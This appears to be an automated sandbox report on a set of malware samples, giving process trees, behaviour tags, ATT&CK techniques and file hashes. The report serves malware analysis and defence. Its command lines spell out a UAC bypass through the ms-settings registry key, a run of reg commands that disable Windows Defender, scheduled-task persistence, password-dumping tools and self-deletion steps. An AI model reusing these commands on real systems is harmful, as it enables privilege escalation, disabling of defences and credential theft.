C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=4756 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:3012
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6080 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:11⤵PID:3076
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5680 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:11⤵PID:3212
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6324 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:3812
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6332 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:1796
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6388 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:2556
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x384 0x48c1⤵PID:1228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6668 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:3084
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=1300 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:4612
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5380 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:4340
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Bazaar.2020.04.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4348
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2a8,0x7ffea3b92e98,0x7ffea3b92ea4,0x7ffea3b92eb02⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2252 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:22⤵PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2972 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:32⤵PID:748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3096 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:82⤵PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4288 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:82⤵PID:2592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4288 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:82⤵PID:1448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2328 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:82⤵PID:3216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4592 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:82⤵PID:4924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4648 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:82⤵PID:4104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=780 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1008 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:82⤵PID:3416
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "C:\Users\Admin\Desktop\InitializeUndo.dotm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1980
-
C:\Users\Admin\Desktop\Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe"C:\Users\Admin\Desktop\Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe"1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5036 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:3760
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4240 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "SMTP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9187.tmp"3⤵
- Creates scheduled task(s)
PID:2496
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "SMTP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp931F.tmp"3⤵
- Creates scheduled task(s)
PID:4068
-
-
-
C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"1⤵
- Executes dropped EXE
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\is-5U2SS.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp"C:\Users\Admin\AppData\Local\Temp\is-5U2SS.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp" /SL5="$70282,3872572,832512,C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4920 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\WindowsPowerShell\Configuration\errorfake.vbs"3⤵PID:4224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.uac.bat" "3⤵PID:1104
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f4⤵
- Modifies registry class
PID:568
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f4⤵
- Modifies registry class
PID:1248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.wdcloud.bat" "3⤵PID:3824
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:3996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:3412
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:4732
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:4520
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3112
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5112
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4528
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1952
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:4028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f4⤵PID:2784
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f4⤵PID:3456
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f4⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f4⤵PID:4308
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"3⤵
- Checks computer location settings
PID:3000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\main.bat" "4⤵PID:744
-
C:\Windows\SysWOW64\mode.commode 65,105⤵PID:384
-
-
C:\ProgramData\7z.exe7z.exe e file.zip -p___________26681pwd226pwd25461___________ -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4352
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_11.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_10.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_9.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_8.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:712
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\SysWOW64\attrib.exeattrib +H "MBSetup.exe"5⤵
- Views/modifies file attributes
PID:4944
-
-
C:\ProgramData\MBSetup.exe"MBSetup.exe"5⤵
- Executes dropped EXE
PID:4844 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 11086⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"3⤵
- Checks computer location settings
PID:2964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.delete.bat" "4⤵PID:1960
-
C:\Windows\SysWOW64\PING.EXEping -n 60 127.15⤵
- Runs ping.exe
PID:3528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del 7z.dll"5⤵PID:4936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del 7z.exe"5⤵PID:4652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del main.bat"5⤵PID:4332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:5016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del file.bin"5⤵PID:2372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.run.vbs"5⤵PID:4300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.2run.vbs"5⤵PID:820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.uac.bat"5⤵PID:4020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.wdcloud.bat"5⤵PID:3952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.delete.bat"5⤵PID:1272
-
-
-
-
-
C:\Users\Admin\Desktop\Exploit.Win32.ShadowBrokers.ae-85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5.exe"C:\Users\Admin\Desktop\Exploit.Win32.ShadowBrokers.ae-85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5.exe"1⤵
- Executes dropped EXE
PID:1128
-
C:\Users\Admin\Desktop\HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe"C:\Users\Admin\Desktop\HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3948 -
C:\Users\Admin\Desktop\HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe"{path}"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3172
-
-
C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe"C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe"1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2968 -
C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe"C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\GetBP.exeC:\Users\Admin\AppData\Local\Temp\GetBP.exe -f C:\Users\Admin\AppData\Local\Temp\QM00013-Browserpassfile.txt3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:744
-
-
C:\Users\Admin\AppData\Local\Temp\EmailPasswordDump.exeC:\Users\Admin\AppData\Local\Temp\EmailPasswordDump.exe -f C:\Users\Admin\AppData\Local\Temp\QM00013-Emailpassfile.txt3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Users\Admin\AppData\Local\Temp\FTPPasswordDump.exeC:\Users\Admin\AppData\Local\Temp\FTPPasswordDump.exe -f C:\Users\Admin\AppData\Local\Temp\QM00013-FTPpassfile.txt3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
-
C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe"C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3500
-
C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Emotet.gen-9b391545739faad182793dcda22cd76ecac4cd4d796dbb69663e976c1df11c5e.exe"C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Emotet.gen-9b391545739faad182793dcda22cd76ecac4cd4d796dbb69663e976c1df11c5e.exe"1⤵
- Executes dropped EXE
PID:4016
-
C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe"C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe"1⤵
- Executes dropped EXE
PID:1868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 6362⤵
- Program crash
PID:2500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1868 -ip 18681⤵PID:1384
-
C:\Users\Admin\Desktop\HEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe"C:\Users\Admin\Desktop\HEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1940 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:3416 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"3⤵
- Accesses Microsoft Outlook accounts
PID:4596
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"3⤵PID:2724
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Scripting
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
488B
MD5a72a109bf328bba4ae3d24b8be49a35c
SHA1cbf6c04c3f48a89a595ce1460a91abf936a6f5fc
SHA25634b5fbf06668ff29395c3152712d83c5c2926bcfde28b597176a273cb98916ae
SHA5122cdf7acd158205c4bf42ee94993b6783e2d51f2d23eb1f05ac3168c52972ff07032bf1e09443c96fb242972284fdb635163e510c42e48cbfbe713737f0f65440
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
